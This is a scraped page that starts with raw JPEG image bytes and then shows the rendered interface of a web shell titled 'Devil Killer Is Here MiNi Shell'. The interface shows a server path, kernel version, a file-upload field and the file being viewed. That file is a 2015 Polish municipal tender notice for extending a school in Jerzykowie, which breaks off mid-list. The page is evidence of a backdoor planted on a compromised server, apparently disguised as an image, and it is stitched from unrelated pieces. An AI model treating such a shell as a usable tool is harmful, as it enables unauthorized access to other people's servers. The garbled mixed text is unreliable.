JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20151016/151451-N-2015.html

<p class="kh_header"><b>Pobiedziska: Rozbudowa i przebudowa szkoły w Jerzykowie, gmina Pobiedziska</b><br>
<b>Numer ogłoszenia: 151451 - 2015; data zamieszczenia: 16.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pobiedziska , ul. Tadeusza Kościuszki 4, 62-010 Pobiedziska, woj. wielkopolskie, tel. 061 8977100, faks 061 8977124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pobiedziska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i przebudowa szkoły w Jerzykowie, gmina Pobiedziska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane polegające na  rozbudowie i przebudowie szkoły w Jerzykowie, Gmina Pobiedziska.
2.	Do istniejącego obiektu dwukondygnacyjnego, w ramach wypełnienia zabudowy, zostanie dobudowany łącznik wraz z budynkiem stanowiącym element rozbudowy, w której znajdą miejsce sale lekcyjne, biblioteka, sala konferencyjna oraz pomieszczenia uzupełniające (toalety, pomieszczenia pomocnicze). W ramach rozbudowy powstanie budynek o powierzchni 1256,46 m2
3.	W ramach Przedmiotu zamówienia ze szczególną rzetelnością należy wykonać te elementy robót 
i urządzeń, które wpływają na współczynniki oszczędności energetycznej budynku, a mianowicie: 
a)	architektura i konstrukcja:
-	roboty budowlane budynku; 
-	ocieplenie ścian zewnętrznych styropianem EPS 70 o gr. 30 cm oraz styropianem ekstradowanym o gr. 26cm. (w niektórych lokalizacjach);
-	 ocieplenie fundamentów polistyrenem o gr. 20cm. współczynnik przenikania ciepła mniejszej lub równej U=0,136 m2/K;
-	  ocieplenie dachów wełna mineralną gr. 40 cm Współczynnik przenikania ciepła mniejszej lub równej U=0,098m2/K;
-	  Stolarka okienna trzyszynowa o współczynniku przenikania ciepła mniejszej lub równej  U=0,9W/m2K;
-	stolarka drzwiowa zewnętrzna o współczynniku przenikania ciepła mniejszej lub równej U=1,3m2/K; 
b)	Instalacje i podłączenia sanitarne:
-	Instalacja grzewczo -wentylacyjna:  Kocioł gazowy kondensacyjny o mocy ok. 98kW;
-	Wewnętrzna instalacja c. o. z grzejnikami zaworowymi, płytowymi, konwektorowymi higienicznymi z blachy stalowej, produkowany według normy PN EN 442, oznakowany znakiem CE; Instalacje cwu - centralne przygotowanie ciepłej wody użytkowej w kotle gazowym; Łączna znamionowa moc zainstalowana w napędach i urządzeniach central wentylacyjnych ok. 4,4 kW, centrala grzewczo-wentylacyjna o wydajności 83%; 
-	Instalacja wodociągowa  - na dotychczasowych zasadach wg projektu.
-	Instalacja kanalizacyjna - do istniejącego przyłącza wg projektu.
-	Instalacja kanalizacji deszczowej - do istniejących studni chłonnych i powierzchniowo na tereny zielone wg projektu.
c)	Roboty elektryczne i teletechniczne według projektów, w tym Oświetlenie o łącznej mocy opraw oświetleniowych 4,0kW daje to wskaźnik na 1m2 = 4000/1256,45=3,2W/m2
4.	Przedmiot zamówienia realizowany będzie w trzech kolejnych latach: 2015, 2016 i 2017, zgodnie z harmonogramem  rzeczowo-finansowym, który zostanie przygotowany przez Wykonawcę po uprzednim skonsultowaniu z Zamawiającym. Ostateczna wersja harmonogramu rzeczowo-finansowego wymaga pisemnej akceptacji Zamawiającego. Natomiast w przypadku rozbieżności między Wykonawcą i Zamawiającym co do treści harmonogramu rzeczowo-finansowego obowiązywać będzie wersja wskazana przez Zamawiającego.

5.	Szczegółowy opis Przedmiotu zamówienia został określony w dokumentacji technicznej (stanowiącej załączniki do SIWZ) :
a)	Projekt budowlany:
-	Tom I - projekt zagospodarowania terenu i projekt architektoniczny;
-	Tom II - projekt konstrukcyjny;
-	Tom II a - projekt konstrukcyjny łącznika;
-	Tom III - projekt instalacji sanitarnych;
-	Tom IV -  projekt elektryczny;
b)	Uzupełnienie do projektu budowlanego pozwolenia na budowę Starosty Poznańskiego nr 5377/12 z 19.10.2012r., w którym zawarto nieistotne zmiany z punktu widzenia prawa budowlanego;
c)	Specyfikacje Techniczne Wykonania i Odbioru Robót - STWiOR;
d)	Koncepcja programowo-przestrzenna;
e)	Opinia Geotechniczna określająca warunki gruntowo-wodne w podłożu projektowanej rozbudowy i przebudowy szkoły w Jerzykowie;
f)	Przedmiary robót (mają charakter pomocniczy przy sporządzaniu  oferty z uwagi na to, że wynagrodzenie Wykonawcy jest Wynagrodzeniem ryczałtowym);
6.	Wszystkie materiały użyte do realizacji przedmiotu zamówienia powinny być nowe i posiadać gwarancję jakości min. 60 miesięcy. Dostarczone materiały/produkty winny być I gatunku oraz powinny posiadać określone obowiązującymi w tym zakresie polskimi przepisami dopuszczenia do stosowania (certyfikaty, atesty, aprobaty techniczne itp.) oraz gwarancje uzyskane od producenta. Powyższe dokumenty należy na żądanie inspektora nadzoru przedstawić przed wbudowaniem materiałów/produktów oraz przekazać Zamawiającemu przy odbiorze końcowym. 
7.	Zamawiający dopuszcza możliwość powierzenia realizacji przedmiotu zamówienia podwykonawcom. W takim przypadku Wykonawca odpowiada za ich działania jak za swoje własne.
8.	Przedmiot umowy Zamawiający zamierza zrealizować korzystając z dofinansowania Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej w ramach Programu Priorytetowego Efektywne wykorzystywanie energii, Część 4) LEMUR - Energooszczędne Budynki Użyteczności Publicznej.
9.	Wykonawca zobligowany będzie również do: 
a)	Wykonania koniecznych rozbiórek istniejących budynków, instalacji, elementów małej architektury i nawierzchni kolidujących z budową;
b)	Obsługi geodezyjnej (przez uprawnionego geodetę) na etapie: wytyczeń w terenie, realizacji inwestycji objętej Przedmiotem umowy, sporządzenia dokumentacji powykonawczej z inwentaryzacją geodezyjną;
c)	Wykonania koniecznych dokumentacji wykonawczych, rysunków wykonawczych koniecznych do realizacji Przedmiotu zamówienia; 
d)	Wykonania dokumentacji i czynności koniecznych do uzyskania pozwolenia na użytkowanie, wraz z poniesieniem kosztów uzgodnień i przeprowadzenia kontroli. Dokumentacje wykonawcze i rysunki wykonawcze w trakcie trwania procesu inwestycyjnego objętego Przedmiotem umowy należy uzgodnić z Zamawiającym przed przystąpieniem do wykonania elementu realizowanego na podstawie przygotowanych przez Wykonawcę dokumentacji i rysunków;
e)	Poniesienia kosztów wyłączeń i włączeń dotyczących sieci, koordynacji i wykonania robót będących 
w kompetencji Zakładu Komunalnego, Zakładu Energetycznego, Zakładu Gazowniczego, itp.;
f)	Dokonania uzgodnień, uzyskania wszelkich wymaganych opinii i decyzji niezbędnych do wykonania Przedmiotu umowy i przekazania go do użytku, w tym przeprowadzenia pozytywnych odbiorów instytucji określonym w polskim prawodawstwie (Inspekcji Ochrony Środowiska, Inspekcji Sanitarnej, Państwowej Inspekcji Pracy, Urzędu Dozoru Technicznego, Państwowej Straży Pożarnej, itp.) i pokrycia wszelkich kosztów z tym związanych;
g)	Złożenia wniosku w imieniu Zamawiającego do Powiatowego Inspektoratu Nadzoru Budowlanego w celu uzyskania decyzji pozwolenia na użytkowanie oraz przeprowadzenie pozytywnego postępowania w tym zakresie wraz z oddaniem Przedmiotu umowy do użytkowania, potwierdzonym ostateczną decyzja administracyjną;
h)	Odpowiedniego zabezpieczenia terenu budowy. Wykonawca jest zobowiązany do pisemnego uzgodnienia z Zamawiającym zabezpieczenia i organizacji robót;
i)	W związku z koniecznością prowadzenia robót na terenie szkoły na Wykonawcy spoczywa bezwzględny obowiązek zapewnienia możliwości technicznych pracy szkoły oraz prowadzenia lekcji i zajęć. Wszystkie działania wykonywane na terenie szkoły mogące wpłynąć na bezpieczeństwo użytkowników terenu szkoły lub prowadzone zajęcia muszą zostać uprzednio uzgodnione w formie pisemnej z dyrektorem placówki lub jego upoważnionym przedstawicielem oraz Zamawiającym;
j)	Zapewnienia dozoru, a także właściwych warunków bezpieczeństwa i higieny pracy;
k)	Prowadzenia robót zgodnie z przepisami bhp i ppoż.;
l)	Utrzymania terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz usuwania na bieżąco zbędnych materiałów, odpadów i śmieci;
m)	Umożliwienia wstępu na teren budowy pracownikom organu nadzoru budowlanego i jednostek sprawujących funkcje kontrolne oraz upoważnionym przedstawicielom Zamawiającego oraz zarządcy terenu szkoły;
n)	Uporządkowania terenu budowy po zakończeniu robót, przywrócenia go do stanu pierwotnego;
o)	Naprawy uszkodzonych urządzeń uzbrojenia podziemnego w trakcie prowadzonych prac budowlanych;
p)	Ubezpieczenia budowy i robót z tytułu szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz od odpowiedzialności cywilnej, na cały czas jej trwania;
q)	Wykonywania prac zgodnie z Harmonogramem rzeczowo-finansowym, którego poszczególne elementy zostaną uzgodnione z Zamawiającym. Harmonogram rzeczowo-finansowy jest załącznikiem do niniejszej Umowy;
r)	Użycia do wykonania Przedmiotu zamówienia nowych materiałów I (pierwszego) gatunku i posiadających świadectwa bezpieczeństwa, atesty, gwarancje i certyfikaty dopuszczające do stosowania w budownictwa w standardzie nie gorszym niż określone w projekcie budowlanym oraz STWOiR;
s)	Wykonania robót zgodnie z obowiązującymi przepisami, normami oraz na ustalonych niniejszą Umową warunkach;
t)	Pokrycia wszystkich kosztów związanych z opracowaniem projektu organizacji ruchu oraz zajęciem pasa drogowego. Przed rozpoczęciem robót w pasie drogowym Wykonawca musi uzyskać od zarządcy drogi decyzję na zajęcie pasa drogowego, zgodnie z ustawą z dnia 21 marca 1985r. o drogach publicznych;
u)	Opracowania instrukcji eksploatacji i użytkowania;
v)	Uwzględnienia i poniesienia kosztów związanych z zagospodarowaniem placu budowy obejmujące pomieszczenia socjalno-bytowe i sanitarne dla osób zatrudnionych biorących udział w procesie technologicznym budowy;
w)	Zabezpieczenia na własny koszt dostawy mediów, w tym wody, do procesów technologicznych budowy jak i socjalno-bytowych osób zatrudnionych;
x)	Pokrycia kosztów związanych ze zużyciem mediów, w tym energii elektrycznej i wody, dla procesów technologicznych budowy i socjalno - bytowych osób zatrudnionych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie w okresie 3 lat zamówienia uzupełniającego w wysokości nie większej niż 50% wartości przedmiotowego zamówienia na podstawie art. 67 ust.1 pkt 6 ustawy Pzp, polegającego na powtórzeniu tego samego rodzaju zamówienia i zgodnego z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.10-5, 45.40.00.00-1, 45.31.00.00-3, 45.31.11.00-1, 45.31.12.00-2, 45.31.23.10-3, 45.31.23.11-0, 45.33.00.00-9, 45.33.10.00-6, 45.23.13.00-8, 45.21.42.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 40.000,00 zł (słownie: czterdzieści tysięcy złotych 00/100) zgodnie z ustawą pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu sposobu dokonywania oceny tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony powyższy warunek, jeżeli wykonawca wykaże się doświadczeniem w wykonaniu co najmniej dwóch odrębnych robót polegających na budowie lub rozbudowie budynków użyteczności publicznej, domów lub budynków usługowo - handlowych o powierzchni użytkowej 1200 m2 minimum każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu sposobu dokonywania oceny tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, za spełniony powyższy warunek, jeżeli wykonawca udokumentuje, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia. Wykaz musi zawierać co najmniej:
-	1 osobę pełniącą funkcję kierownika robót posiadającego uprawnienia w specjalności konstrukcyjno - budowlanej z min. 5 -letnim doświadczeniem zawodowym w kierowaniu robotami budowlanymi w zakresie budowy lub przebudowy budynków,
-	1 osobę pełniącą funkcję kierownika robót posiadającego uprawnienia w specjalności instalacyjnej z min. 5- letnim doświadczeniem zawodowym w kierowaniu robotami budowlanymi w zakresie wodno - kanalizacyjnymi,
-	1 osobę pełniącą funkcję kierownika robót posiadającego uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych z min. 5- letnim doświadczeniem zawodowym w kierowaniu robotami budowlanymi w zakresie elektryki;
Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów zgodnie z Art.104 Ustawy Prawo budowlane ( Dz. U. 2010 r. Nr 243 poz. 1623 z póz. zmianami) w myśl którego osoby, które przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. W przypadku Wykonawców zagranicznych dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony w/w warunek jeżeli wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej, od szkód i zdarzeń losowych w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 1.500.000,00 zł ( zakres ubezpieczenia musi obejmować co najmniej szkody poniesione przez osoby trzecie w wyniku śmierci, uszkodzenie ciała, rozstroju zdrowia lub w wyniku utraty, zniszczenia lub uszkodzenia mienia własnego lub osób trzecich, jak również szkód spowodowanych błędami, powstałymi w związku z wykonywaniem robót budowlanych i innych prac objętych przedmiotem Umowy)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wzór umowy jest załącznikiem do SIWZ.
2.	Zawarta umowa będzie umową ryczałtową.
3.	Na podstawie art. 144 PZP Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej z uwzględnieniem podawanych warunków ich wprowadzenia. 
4.	Zmiany w zakresie terminu realizacji zamówienia - roboty budowlane:
a)	Zmiany spowodowane warunkami geologicznymi, terenowymi, archeologicznymi, wodnymi itp., w szczególności: 
-	Istotne odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntu, skał itp.);
-	istotne odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;
-	niewypały i niewybuchy, zagrożenie tąpnięciami, wybuchem;
-	nieprzewidywane wykopaliska archeologiczne nie przewidziane w SIWZ.
b)	Zamiany będące następstwem okoliczności leżących po stronie Zamawiającego w szczególności: 
-	wstrzymanie realizacji umowy przez Zamawiającego;
-	konieczność usunięcia błędów w dokumentacji projektowej załączonej do SIWZ;
-	zmiana dokumentacji projektowej dostarczonej przez Zamawiającego.
c)	Zmiany będące następstwem działania organów administracji, w szczególności: 
-	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp.,
-	wydanie postanowienia o wstrzymaniu robót budowlanych z przyczyn innych niż zawinione przez Wykonawcę w przypadku o którym mowa w art. 50 ust. 1 pkt 4 Prawa budowlanego,
-	konieczność uzyskania wyroku sądowego, lub innego orzeczenia sądu lub organu, którego konieczności nie przewidywano przy zawieraniu Umowy,
  W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w punkcie a-c termin wykonania Umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania przedmiotu umowy w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. Każda taka zmiana wprowadzona będzie w trybach i procedurach opisanych w Umowie.
5.	Zmiany technologiczne, mogące skutkować również zmianą wynagrodzenia Wykonawcy, w szczególności:
a)	pojawienie się na rynku części, materiałów lub urządzeń nowszej generacji, pozwalających na zmniejszenie kosztów realizacji Umowy lub kosztów eksploatacji wykonanego obiektu;
